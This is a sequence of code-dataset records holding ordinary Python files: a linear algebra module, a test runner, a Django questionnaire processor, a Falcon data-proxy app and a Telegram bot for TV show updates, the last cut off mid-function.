LU factorization for a Matrix A and return \n# [L, U, P] for L: Lower triangulation, U: Upper triangulation and P: \n# Permutation matrix used to keep largest element in pivot locations.\ndef lu(M, info=None):\n if not isinstance(M, Matrix):\n return None\n rows, cols = M.size()\n if rows != cols:\n raise ArithmeticError(\"LU factorization requires a square matrix (rows == cols)\") \n A = copy.deepcopy(M)\n L = Matrix(rows, cols, mtype='i')\n U = Matrix(rows, cols)\n P = Matrix(rows, cols, mtype='i')\n # Adjust rows of A so largest element is in the pivot of each row\n l = 0\n swaps = 0\n for i in range(rows):\n max_l = abs(A[i][l])\n swap = i\n for j in range(i + 1, rows):\n if abs(A[j][l]) > max_l:\n max_l = abs(A[j][l])\n swap = j\n if i != swap:\n P.swap(i, swap)\n swaps += 1\n l += 1\n # Swap rows to get larger pivots\n A = P * A\n # Keep track of the current pivot we are at to determine side of diagonal\n l = 0\n for i in range(rows):\n for j in range(cols):\n # Upper diagonal of U, including diagonal\n if j >= l:\n U[i][j] = A[i][j] - __ludot(i, U, L, i, j)\n # Lower diagonal of L, not including the diagonal\n else:\n L[i][j] = 1 / U[j][j] * (A[i][j] - __ludot(j, U, L, i, j))\n l += 1\n if info and info == 's':\n return [L, U, P, swaps]\n return [L, U, P]\n\n# Will do our best to solve Ax = b, assume b is a list\n# Will return the solution x and permutation matrix P used for numerical accuracy\ndef linsolve(A, b):\n if not isinstance(A, Matrix):\n return None\n # Expect b to be a list\n if isinstance(b, Matrix):\n b = b.list()\n # Verify b was a matrix turned into a list or was passed as a list\n if not isinstance(b, list):\n return None\n # Not sure how we should solve non square matrices since there are non unique solutions\n M = copy.deepcopy(A)\n if A.rows != A.cols and rank(A) == A.cols:\n raise ArithmeticError(\"Can only solve for square, invertible matrices\")\n L, U, P = lu(M)\n bp = (P * b).list()\n # Below works because if Lc = b and Ux = c, then Ax = LUx = L(Ux) = Lc = b\n # Solve Lc = b\n c = [1] * L.rows\n for i in range(L.rows):\n rhs = bp[i]\n for j in range(L.cols):\n if i != j:\n rhs -= L[i][j] * c[j]\n # No need to divide pivot since lower triangulation has 1s in the pivots\n c[i] = rhs\n # Now solve Ux = c\n x = [1] * U.rows\n for i in range(U.rows - 1, -1, -1):\n rhs = c[i]\n for j in range(U.cols):\n if i != j:\n rhs -= U[i][j] * x[j]\n x[i] = rhs / U[i][i]\n return x\n\n# Solve inverse by augmenting identity matrix to A and performing row reduction\ndef inv(A):\n if not isinstance(A, Matrix):\n return None\n if A.rows != A.cols:\n raise ArithmeticError('Non-square matrices do not have an inverse')\n if rank(A) != A.cols:\n raise ArithmeticError('Matrix A must have full column rank to be an invertible matrix')\n i = Matrix(A.rows, A.cols, mtype='i')\n t = copy.deepcopy(A)\n t.augment(i)\n r = rref(t)\n return r.slice(0, A.cols)\n\n# Compute the dot product of two lists\ndef dot(l1, l2):\n if not isinstance(l1, list):\n raise ArithmeticError('Cannot do dot product on non lists types')\n if not isinstance(l2, list):\n raise ArithmeticError('Cannot do dot product on non lists types')\n if len(l1) != len(l2):\n raise ArithmeticError('Size of lists do not match')\n r = 0\n for i in range(len(l1)):\n r += l1[i] * l2[i]\n return r\n\n# Returns the eucliden norm of the list l\ndef norm(l):\n if not isinstance(l, list):\n raise ArithmeticError('Cannot compute euclidean distance of a non list')\n return math.sqrt(dot(l, l))\n\n# Projection of vectors a onto b\ndef proj(a, b):\n if not isinstance(a, list) or not isinstance(b, list):\n raise ArithmeticError('Can only currently project lists onto lists')\n c = dot(a, b) / dot(b, b)\n return [c * b[i] for i in range(len(b))]\n\n# Componenet wise subtraction of the list b from the list a\ndef __lsub(a, b):\n if not isinstance(a, list) or not isinstance(b, list):\n raise AttributeError('Both parameters must be lists')\n if len(a) != len(b):\n raise ArithmeticError('Both lists must be the same size')\n return [a[i] - b[i] for i in range(len(a))]\n\n# Component wise division of the list a with the value b\ndef __ldiv(a, b):\n if not isinstance(a, list):\n raise AttributeError('Parameter a must be a list')\n return [a[i] / b for i in range(len(a))]\n\n# Uses Gram-Schmidt process to orthonormalize the matrix A\ndef orth(A):\n if not isinstance(A, Matrix):\n raise ArithmeticError('Cannot only execute Gram-Schmidt on Matrices')\n Q = copy.deepcopy(A)\n for j in range(A.cols):\n c = Q.col(j)\n Q.set_col(j, __ldiv(c, norm(c)))\n qj = Q.col(j)\n for i in range(j + 1, A.cols):\n ci = Q.col(i)\n Q.set_col(i, __lsub(ci, proj(ci, qj)))\n return Q\n\n# Test if Matrix is upper triangular\ndef istriu(A):\n if not isinstance(A, Matrix):\n return False\n if A.cols != A.rows:\n return False\n for i in range(1, A.rows):\n # Up until the diagonal\n for j in range(i):\n if not math.isclose(A[i][j], 0, abs_tol=.001):\n return False\n return True\n\ndef istril(A):\n if not isinstance(A, Matrix):\n return False\n if A.cols != A.rows:\n return False\n for j in range(1, A.cols):\n # Up until the diagonal\n for i in range(j):\n if not math.isclose(A[i][j], 0, abs_tol=.001):\n return False\n return True\n\n# Perform QR factorization on the matrix A\ndef qr(A):\n if not isinstance(A, Matrix):\n raise AttributeError('A must be a matrix')\n Q = orth(A)\n # Finding a matrix R such that A = QR\n # A = QR\n # Q(inverse) * A = Q(inverse) * Q * R\n # Q(inverse) * A = I * R\n # The inverse of a orthonormal matrix is Q(transpose)\n R = Q.transposed() * A\n return [Q, R]\n\n# Calculate the determinant of a matrix A using LU factorization.\n# The determinant of a triangular matrix is the product of the diagonal entries.\n# Therefore:\n# if A = P*L*U\n# det(A) = det(P)*det(L)*det(U)\n# where\n# det(P) is -1^(number of row exchanges)\ndef det(A):\n if not isinstance(A, Matrix):\n raise AttributeError('A must be a matrix')\n # Quick case that the matrix is already triangular\n if istriu(A) or istril(A):\n det = A[0][0]\n for i in range(1, A.rows):\n det *= A[i][i]\n return det\n # If matrix is singular the determinant is 0\n if rank(A) != A.cols:\n return 0\n # Else generate triangular factorization\n L, U, P, row_exchanges = lu(A, info='s')\n detP = math.pow(-1, row_exchanges)\n detL = L[0][0]\n for i in range(1, L.rows):\n detL *= L[i][i]\n detU = U[0][0]\n for i in range(1, U.rows):\n detU *= U[i][i]\n return detP * detL * detU","sub_path":"lalg.py","file_name":"lalg.py","file_ext":"py","file_size_in_byte":9727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"154302434","text":"#!/bin/env python\n\n# Copyright (C) 2013 Arthur D'Andréa Alemar\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of\n# the Software, and to permit persons to whom the Software is furnished to do so,\n# subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\n# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\n# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nfrom __future__ import print_function\n\nimport sys\nimport os\nimport os.path\nimport subprocess\n\nfrom tempfile import TemporaryFile\nfrom difflib import unified_diff\n\nclass TestCase:\n def __init__(self, testName, input, output):\n self.testName = testName\n self.input = input\n self.output = output\n\nclass TestResult:\n def __init__(self, case, diff):\n self.case = case\n self.diff = diff\n \n def __nonzero__(self):\n return len(self.diff) == 0\n\nOK = '\\033[92m'\nFAIL = '\\033[91m'\nEND = '\\033[0m'\n\nclass TestRunner:\n def __init__(self):\n self._tests = []\n \n def addTestCase(self, testName, input, output):\n self._tests.append(TestCase(testName, input, output))\n \n def run(self, args):\n self.results = []\n tests = 0\n tests_ok = 0\n tests_fail = 0\n for test in self._tests:\n with TemporaryFile(mode='w+') as tempfile:\n with open(test.input, 'Ur') as stdin:\n subprocess.call([\"bin/main\"]+args, stdin=stdin, stdout=tempfile, stderr=subprocess.STDOUT)\n tempfile.seek(0)\n diff = None\n with open(test.output, 'Ur') as expected_output:\n diff = ''.join(unified_diff(list(tempfile), list(expected_output), fromfile='actual.'+test.testName, tofile='expected.'+test.testName))\n result = TestResult(test, diff)\n tests += 1\n if result:\n tests_ok += 1\n sys.stdout.write(OK + \".\")\n else:\n tests_fail += 1\n sys.stdout.write(FAIL + \"F\")\n self.results.append(result)\n if tests_fail is 0:\n sys.stdout.write(\"\\nSUCCESS ({0} tests successful)\\n\".format(tests))\n sys.stdout.write(END)\n else:\n sys.stdout.write(\"{0}\\nFAIL {1}({2} tests successful, {3} tests failed)\\n\\n\".format(FAIL, END, tests_ok, tests_fail))\n sys.stdout.write(END)\n for result in self.results:\n if not result:\n sys.stdout.write(result.diff)\n\nif __name__ == \"__main__\":\n try:\n import colorama\n except ImportError:\n pass\n else:\n colorama.init()\n \n import glob\n runner = TestRunner()\n for test in glob.glob(\"tests/test.*.txt\"):\n output = os.path.join(os.path.dirname(test), \"results\", os.path.basename(test))\n if os.path.exists(output):\n runner.addTestCase(os.path.basename(test), test, output)\n else:\n print(\"output file \\\"\"+output+\"\\\" does not exist\")\n #testName = \"test-{:03}.txt\".format(x)\n #input = os.path.join(\"test\", testName)\n #output = os.path.join(\"test\", \"result\", testName)\n #if os.path.exists(input) and os.path.exists(output):\n # runner.addTestCase(testName, input, output)\n runner.run(sys.argv[1:])","sub_path":"hash/runTests.py","file_name":"runTests.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"361749369","text":"from questionnaire import *\nfrom django.utils.translation import ugettext as _, ungettext\n\n@question_proc('choice', 'choice-freeform')\ndef question_choice(request, question):\n choices = []\n jstriggers = []\n\n cd = question.getcheckdict()\n key = \"question_%s\" % question.number\n key2 = \"question_%s_comment\" % question.number\n val = None\n if key in request.POST:\n val = request.POST[key]\n else:\n if 'default' in cd:\n val = cd['default']\n for choice in question.choices():\n choices.append( ( choice.value == val, choice, ) )\n\n if question.type == 'choice-freeform':\n jstriggers.append('%s_comment' % question.number)\n\n return {\n 'choices' : choices,\n 'sel_entry' : val == '_entry_',\n 'qvalue' : val or '',\n 'required' : True,\n 'nobreaks' : cd.get(\"nobreaks\", False),\n 'comment' : request.POST.get(key2, \"\"),\n 'jstriggers': jstriggers,\n }\n\n@answer_proc('choice', 'choice-freeform')\ndef process_choice(question, answer):\n opt = answer['ANSWER'] or ''\n if not opt:\n raise AnswerException(_(u'You must select an option'))\n if opt == '_entry_' and question.type == 'choice-freeform':\n opt = answer.get('comment','')\n if not opt:\n raise AnswerException(_(u'Field cannot be blank'))\n else:\n valid = [c.value for c in question.choices()]\n if opt not in valid:\n raise AnswerException(_(u'Invalid option!'))\n return opt\nadd_type('choice', 'Choice [radio]')\nadd_type('choice-freeform', 'Choice with a freeform option [radio]')\n\n\n@question_proc('choice-multiple', 'choice-multiple-freeform')\ndef template_multiple(request, question):\n key = \"question_%s\" % question.number\n choices = []\n counter = 0\n cd = question.getcheckdict()\n defaults = cd.get('default','').split(',')\n for choice in question.choices():\n counter += 1\n key = \"question_%s_multiple_%d\" % (question.number, choice.sortid)\n if key in request.POST or \\\n (request.method == 'GET' and choice.value in defaults):\n choices.append( (choice, key, ' checked',) )\n else:\n choices.append( (choice, key, '',) )\n extracount = int(cd.get('extracount', 0))\n if not extracount and question.type == 'choice-multiple-freeform':\n extracount = 1\n extras = []\n for x in range(1, extracount+1):\n key = \"question_%s_more%d\" % (question.number, x)\n if key in request.POST:\n extras.append( (key, request.POST[key],) )\n else:\n extras.append( (key, '',) )\n return {\n \"choices\": choices,\n \"extras\": extras,\n \"nobreaks\" : cd.get(\"nobreaks\", False),\n \"template\" : \"questionnaire/choice-multiple-freeform.html\",\n \"required\" : cd.get(\"required\", False) and cd.get(\"required\") != \"0\",\n\n }\n\n@answer_proc('choice-multiple', 'choice-multiple-freeform')\ndef process_multiple(question, answer):\n multiple = []\n\n requiredcount = 0\n required = question.getcheckdict().get('required', 0)\n if required:\n try:\n requiredcount = int(required)\n except ValueError:\n requiredcount = 1\n if requiredcount and requiredcount > question.choices().count():\n requiredcount = question.choices().count()\n\n for k, v in answer.items():\n if k.startswith('multiple'):\n multiple.append(v)\n if k.startswith('more') and len(v.strip()) > 0:\n multiple.append(v)\n\n if len(multiple) < requiredcount:\n raise AnswerException(ungettext(u\"You must select at least %d option\",\n u\"You must select at least %d options\",\n requiredcount) % requiredcount)\n return \"; \".join(multiple)\nadd_type('choice-multiple', 'Multiple-Choice, Multiple-Answers [checkbox]')\nadd_type('choice-multiple-freeform', 'Multiple-Choice, Multiple-Answers, plus freeform [checkbox, input]')\n\n\n","sub_path":"questionnaire/qprocessors/choice.py","file_name":"choice.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"639470809","text":"import falcon\nimport logging\nimport pkg_resources\n\nfrom .stores import RawStore, ProcessedFileStore,\\\n IncidentFileStore, CacheFileStore\n\nfrom .routes.push import PushReceiver\nfrom .provider.json.processor import GenericJsonProcessor\nfrom . import Config\nimport threading\nimport os\n\n\ndef get_push_receiver(provider_name, provider_processor, provider_success_response=None, raw_store=None, processed_store=None, incident_store=None):\n if provider_success_response is None:\n provider_success_response = Config.get(provider_name, \"processor\", \"response\", default=\"RECEIVED_OK\")\n if raw_store is None:\n raw_store = RawStore()\n if processed_store is None:\n processed_store = ProcessedFileStore()\n if incident_store is None:\n incident_store = IncidentFileStore()\n return PushReceiver(\n raw_store,\n processed_store,\n incident_store,\n provider_name,\n provider_success_response,\n provider_processor\n )\n\n\ndef create_app(raw_store, processed_store, incident_store):\n \"\"\"\n Creates the Falcon app and adds routes to all providers\n \"\"\"\n api = falcon.API()\n\n provider_config = Config.get(\"providers\", default={})\n\n background_threads = []\n\n for key, value in provider_config.items():\n logging.getLogger(__name__).info(\"Configuring provider \" + key + \" ...\")\n if \"processor\" in value and value[\"processor\"][\"type\"] == \"generic\":\n _processor = GenericJsonProcessor(value[\"processor\"].get(\"timezone\", None))\n logging.getLogger(__name__).info(\" ... processor \" + _processor.__class__.__name__)\n else:\n module_to_load = Config.get(\"providers\", key, \"module\", default=key)\n try:\n module = __import__(module_to_load, fromlist=[module_to_load])\n except Exception: # ModuleNotFoundError\n module = __import__(\"dataproxy.provider.modules.\" + module_to_load, fromlist=[module_to_load])\n logging.getLogger(__name__).info(\" ... external module \" + module_to_load)\n _class = getattr(module, \"Processor\")\n _processor = _class()\n\n # check if a thread is necessary\n try:\n _class = getattr(module, \"BackgroundThread\")\n _object = _class()\n background_threads.append(\n threading.Thread(\n name=_object.getName(),\n target=_object.run\n )\n )\n except AttributeError:\n pass\n\n logging.getLogger(__name__).info(\"Adding provider \" + key + \", route \" + \"/push/\" + key)\n api.add_route(\n \"/push/\" + key,\n get_push_receiver(\n key,\n _processor,\n value[\"processor\"].get(\"response\", None),\n raw_store,\n processed_store,\n incident_store\n )\n )\n\n # start all background threads\n for t in background_threads:\n logging.getLogger(__name__).info(\"Starting thread for {}\".format(t))\n t.start()\n\n from .routes.isalive import IsAlive\n api.add_route(\"/isalive\", IsAlive(incident_store, background_threads))\n\n from .routes.statistics import GetStatistics\n api.add_route(\"/statistics\", GetStatistics())\n\n from .routes.replay import Replay\n api.add_route(\"/replay\", Replay())\n\n return api\n\n\ndef get_app():\n \"\"\"\n Initiates the stores and creates the falcon app\n \"\"\"\n # check bookiesports versiom\n versions = {}\n for name in [\"peerplays\", \"bookiesports\"]:\n try:\n versions[name] = pkg_resources.require(name)[0].version\n except pkg_resources.DistributionNotFound:\n versions[name] = \"not installed\"\n\n if versions[\"bookiesports\"].split(\".\")[0] == \"0\" and versions[\"bookiesports\"].split(\".\")[1] == \"0\" and\\\n int(versions[\"bookiesports\"].split(\".\")[2]) < 25:\n raise Exception(\"Please upgrade your bookiesports version to >= 0.0.25 (pip3 install bookiesports --upgrade)\")\n\n # initialize stores or other modules that may be mocked for testing\n processed_store = ProcessedFileStore()\n incident_store = IncidentFileStore()\n raw_store = RawStore()\n app = create_app(raw_store, processed_store, incident_store)\n\n logging.getLogger(__name__).info(\"BOS dataproxy uses \" + str(versions) + \", has been initialized and is listening to incoming pushes ...\")\n\n return app\n","sub_path":"dataproxy/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"492000197","text":"\n# import logging\n# logging.basicConfig(level=logging.DEBUG)\n\nimport traceback\nfrom datetime import date, timedelta, datetime\nimport time\nfrom src.tgcalendar.telegramcalendar import create_calendar\n\nimport telebot\n\nfrom config import *\nfrom src.TVShows import *\nfrom src.BotUser import *\n\n\n\ndef main():\n\n # raise RuntimeError()\n current_command = {}\n\n bot = telebot.TeleBot(config.telegram_token)\n\n tv = TVShows(AirdatesHelper(config.data_dir_path, config.cache_path, True, False, True))\n engines = tv.engines_data\n\n # thread safe and multiprocess safe, can be a single instance\n user_storage_hlp = BotUserStorageHelper(config.db_path, config.cache_path)\n\n @bot.message_handler(commands=['start'])\n def send_welcome(message):\n\n try:\n\n username = message.from_user.username\n\n user_text = f\"Greetings {username}!\\n\\n\"\n reply_text = user_text + \"Welcome to airdatesTVbot. This bot will send you your favorite shows based on information provided by airdates.tv website.\\n\\n\" \\\n \"To enjoy all the features of the bot you might want to register on airdates.tv and provide your airdates nickname to the bot. Registering on airdates.tv wll allow you to monitor your favorite shows both on the website and in the bot.\\n\\n\" \\\n \"To start the registration please use command /reg\\n\" \\\n \"If you want to change your details provided in the registration, please use the commands:\\n/setairdatesuser\\n/setdaily\\n/settime\\n\\n\" \\\n \"Or just click /today or /today_all to see today's TV shows.\\nType the search query and press send to search for specific shows.\\n\\n\" \\\n \"New shows are marked \" + EMOJIS['new_show'] + \" and returning shows marked \" + EMOJIS['return_show'] + \\\n \" Near your shows you will see the checkmark \" + EMOJIS['user_show']\n\n bot.send_message(message.chat.id, reply_text, parse_mode='HTML')\n\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.save_tg_user()\n\n print(message)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.message_handler(commands=['reg'])\n def register(message):\n\n try:\n bot.clear_step_handler_by_chat_id(chat_id=message.chat.id)\n\n keyboard = telebot.types.InlineKeyboardMarkup()\n key_yes = telebot.types.InlineKeyboardButton(text='Yes', callback_data='reg-airdates-user-yes')\n key_no = telebot.types.InlineKeyboardButton(text='No, Next', callback_data='reg-airdates-user-no')\n key_cancel = telebot.types.InlineKeyboardButton(text='Cancel', callback_data='reg-cancel')\n keyboard.row(key_yes, key_no, key_cancel)\n\n bot.send_message(message.chat.id, \"The registration will allow you to subscribe to daily updates and get personalized digests. Do you want to add your airdates user? Please, note that it'll override previosly registered one\", reply_markup=keyboard)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.callback_query_handler(func=lambda call: call.data is not None and call.data.startswith('reg-airdates-user'))\n def get_reg_airdates_answer(call):\n\n try:\n if call.data == 'reg-airdates-user-yes':\n # ask for the name, next step get it\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text='Please write you airdates username:')\n bot.register_next_step_handler(call.message, update_airdates_user)\n\n elif call.data == 'reg-airdates-user-no':\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=\"Ok, let's proceed to the next step\")\n ask_daily_send(call.message)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n def update_airdates_user(message, is_step=True):\n airdates_username = message.text\n\n try:\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.register_airdates_user(airdates_username)\n msg = bot.send_message(message.chat.id, \"The user was successfully updated!\")\n if is_step:\n ask_daily_send(msg)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n def ask_daily_send(message):\n\n try:\n keyboard = telebot.types.InlineKeyboardMarkup()\n key_yes = telebot.types.InlineKeyboardButton(text='Yes', callback_data='reg-daily-yes')\n key_no = telebot.types.InlineKeyboardButton(text='No', callback_data='reg-daily-no')\n key_cancel = telebot.types.InlineKeyboardButton(text='Cancel', callback_data='reg-cancel')\n\n keyboard.row(key_yes, key_no, key_cancel)\n\n bot.send_message(message.chat.id, \"Would you like to receive daily updates? The update time is set by default to 00:00 UTC, you will be later able to change it with /settime command\", reply_markup=keyboard)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n @bot.callback_query_handler(func=lambda call: call.data is not None and call.data.startswith('reg-daily'))\n def get_reg_daily_answer(call):\n\n try:\n if call.data == 'reg-daily-yes':\n daily_enabled = True\n text = 'You will receive the daily updates!\\n\\nYou can change this setting later with the command /setdaily'\n else:\n daily_enabled = False\n text = 'Ok, no daily updates.\\n\\nYou can change this setting later with the command /setdaily'\n\n bot_user = BotUser(call.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.update_daily_enabled(daily_enabled=daily_enabled)\n\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=text)\n bot.clear_step_handler_by_chat_id(chat_id=call.message.chat.id)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.callback_query_handler(func=lambda call: call.data is not None and call.data.startswith('reg-cancel'))\n def cancel_registration(call):\n\n try:\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text='''Registration is cancelled. You can start over any time by using the /reg command.''')\n bot.clear_step_handler_by_chat_id(chat_id=call.message.chat.id)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.message_handler(commands=['setdaily'])\n def set_daily(message):\n\n try:\n keyboard = telebot.types.InlineKeyboardMarkup()\n key_yes = telebot.types.InlineKeyboardButton(text='Yes', callback_data='setdaily-yes')\n key_no = telebot.types.InlineKeyboardButton(text='No', callback_data='setdaily-no')\n key_cancel = telebot.types.InlineKeyboardButton(text='Cancel', callback_data='setdaily-cancel')\n keyboard.row(key_yes, key_no, key_cancel)\n\n bot.send_message(message.chat.id, \"Would you like to receive the daily updates of your shows that are screened today (you will receive all the shows in case you're not registered)?\", reply_markup=keyboard)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n @bot.callback_query_handler(func=lambda call: call.data is not None and call.data.startswith('setdaily-'))\n def set_daily_answer(call):\n\n try:\n if call.data == 'setdaily-yes':\n bot_user = BotUser(call.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.update_daily_enabled(True)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text='You will receive the daily updates!')\n\n elif call.data == 'setdaily-no':\n bot_user = BotUser(call.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.update_daily_enabled(False)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=\"Ok, no daily updates\")\n\n else:\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=\"Ok, ok, no touching\")\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.message_handler(commands=['settime'])\n def set_daily_hour(message):\n\n try:\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n hour = 0\n for i in range(0, 4):\n hour_button_row = []\n for j in range(0, 6):\n hour_button_row.append(telebot.types.InlineKeyboardButton(f'{hour}:00', callback_data=f\"settime-{hour}\"))\n hour += 1\n keyboard.row(*hour_button_row)\n\n bot.send_message(message.chat.id, \"Please, choose your preferred hour (UTC time) for daily updates\", reply_markup=keyboard)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.callback_query_handler(func=lambda call: call.data is not None and call.data.startswith('settime-'))\n def set_daily_hour_answer(call):\n\n try:\n hour = int(call.data.split('settime-')[1])\n bot_user = BotUser(call.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.update_daily_hour(hour)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=f'Your daily updates is set at {hour}:00 UTC time!')\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n def format_daily_type_keyboard(bot_user: BotUser):\n\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n daily_types = ['yday', 'today', 'tmrw']\n daily_types_row = []\n for daily_type in daily_types:\n btn_emoji = '✅' if daily_type in bot_user.daily_types else '❌'\n daily_type_action = 'uncheck' if daily_type in bot_user.daily_types else 'check'\n btn_text = f'{btn_emoji} ' + get_day_text_by_type(daily_type)\n\n daily_types_btn = telebot.types.InlineKeyboardButton(btn_text, callback_data=f'setdailytype-{daily_type}-{daily_type_action}')\n daily_types_row.append(daily_types_btn)\n\n keyboard.row(*daily_types_row)\n return keyboard\n\n\n @bot.message_handler(commands=['setdailytype'])\n def set_daily_type(message):\n\n try:\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n\n if not bot_user.daily_enabled:\n bot.send_message(message.chat.id, \"To choose your preferred types of updates please enable your daily updates first - /setdaily\")\n return\n\n keyboard = format_daily_type_keyboard(bot_user)\n bot.send_message(message.chat.id, \"Please, choose your preferred types of updates you would like to receive every day:\", reply_markup=keyboard)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.callback_query_handler(func=lambda call: call.data is not None and call.data.startswith('setdailytype-'))\n def set_daily_hour_answer(call):\n\n try:\n daily_type = call.data.split('-')[1]\n daily_type_action = call.data.split('-')[2]\n\n bot_user = BotUser(call.from_user.id, storage_hlp=user_storage_hlp)\n\n user_daily_types = bot_user.daily_types\n if daily_type in user_daily_types:\n if daily_type_action == 'uncheck':\n user_daily_types.remove(daily_type)\n else:\n if daily_type_action == 'check':\n user_daily_types.append(daily_type)\n\n bot_user.update_daily_types(user_daily_types)\n\n keyboard = format_daily_type_keyboard(bot_user)\n\n bot.edit_message_text(\"Please, choose your preferred types of updates you would like to receive every day:\", call.from_user.id, call.message.message_id, reply_markup=keyboard)\n bot.answer_callback_query(call.id, text=\"\")\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.message_handler(commands=['setairdatesuser'])\n def set_airdates_user(message):\n\n try:\n bot.send_message(message.chat.id, \"Please write you airdates username:\")\n bot.register_next_step_handler(message, update_airdates_user, is_step=False)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.message_handler(commands=['today', 'today_all', 'yday', 'yday_all', 'tmrw', 'tmrw_all'])\n def send_shows(message):\n\n try:\n user_only = True\n day_param = 'today'\n if '_all' in message.text:\n user_only = False\n if 'yday' in message.text:\n day_param = 'yday'\n elif 'tmrw' in message.text:\n day_param = 'tmrw'\n\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n shows = tv.get_shows(day_param, bot_user, user_only)\n\n header_text = format_show_text_header(day_param, bot_user.airdates_user, shows['date'], not user_only)\n reply_text = header_text + format_shows_text(shows['episodes'])\n\n bot.send_message(message.chat.id, reply_text + format_footer(bot_user.airdates_user), parse_mode='HTML')\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n @bot.message_handler(commands=['new', 'return', 'new_prev', 'return_prev', 'new_next', 'return_next'])\n def send_new_shows(message):\n\n try:\n\n new_type = 'series'\n new_text = 'Show Premiers'\n if 'return' in message.text:\n new_type = 'season'\n new_text = 'Returning Shows'\n\n interval = 'week'\n if 'prev' in message.text:\n interval = 'prev'\n elif 'next' in message.text:\n interval = 'next'\n\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n shows = tv.get_new_shows(interval, new_type, bot_user)\n\n header_text = f'Here are the {new_text} this week:\\n\\n'\n reply_text = header_text + format_shows_days_text(shows)\n\n bot.send_message(message.chat.id, reply_text + format_footer(), parse_mode='HTML')\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.message_handler(func=lambda message: message.text is not None and message.text.startswith('/details'))\n def send_episode_details(message):\n\n try:\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n\n episode_id = message.text.split('_', 1)[-1]\n episode = tv.find_episode_by_episode_id(episode_id)\n\n if episode:\n reply_text = 'Details of episode \\n' + format_episode_details(episode, engines)\n else:\n reply_text = 'Sorry, cannot find episode'\n\n bot.send_message(message.chat.id, reply_text + format_footer(bot_user.airdates_user), parse_mode='HTML')\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n\n @bot.message_handler(commands=['refresh'])\n def refresh_data(message):\n try:\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n\n if bot_user.airdates_user:\n refresh_count = bot_user.get_refresh_count()\n if refresh_count < USER_REFRESH_DAILY_LIMIT:\n tv.refresh_user_data(bot_user)\n new_count = bot_user.update_refresh_count()\n\n if 